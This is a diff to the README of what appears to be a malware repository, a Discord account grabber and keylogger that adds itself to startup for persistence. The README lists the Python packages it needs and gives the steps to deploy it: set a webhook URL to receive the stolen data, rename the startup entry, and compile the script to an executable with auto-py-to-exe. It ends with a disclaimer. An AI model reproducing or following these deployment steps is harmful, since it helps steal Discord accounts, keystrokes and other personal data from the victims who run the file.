Empirero395/Discord-grabber/README.md

 This is a Discord info grabber and keylogger.
 It can be used to to steal discord account's and it is added to startup for persistence.

-Here is a list of what you need to do: pip install's: requests, pynput, pyperclip, pycryptodome, psutil, pywin32.
+Here is a list of what you need to do:

+pip install's:

+requests
+pynput
+pyperclip
+pycryptodome
+psutil
+pywin32
+Steps:

-Replace webhook url with the one you want the info to be sent to.
+Replace the webhook URL with the one you want the info to be sent to.
-You would want to change the rename of the startup.
+Change the rename of the startup.
-Then you need to compile the code with auto_py_to_exe.
+Compile the code with auto-py-to-exe.
-And then its ready for use.
+It’s ready for use.
+Note:
 I might upgrade this info grabber in the future.

+Disclaimer:
 I am not responsible for any misuse of this code.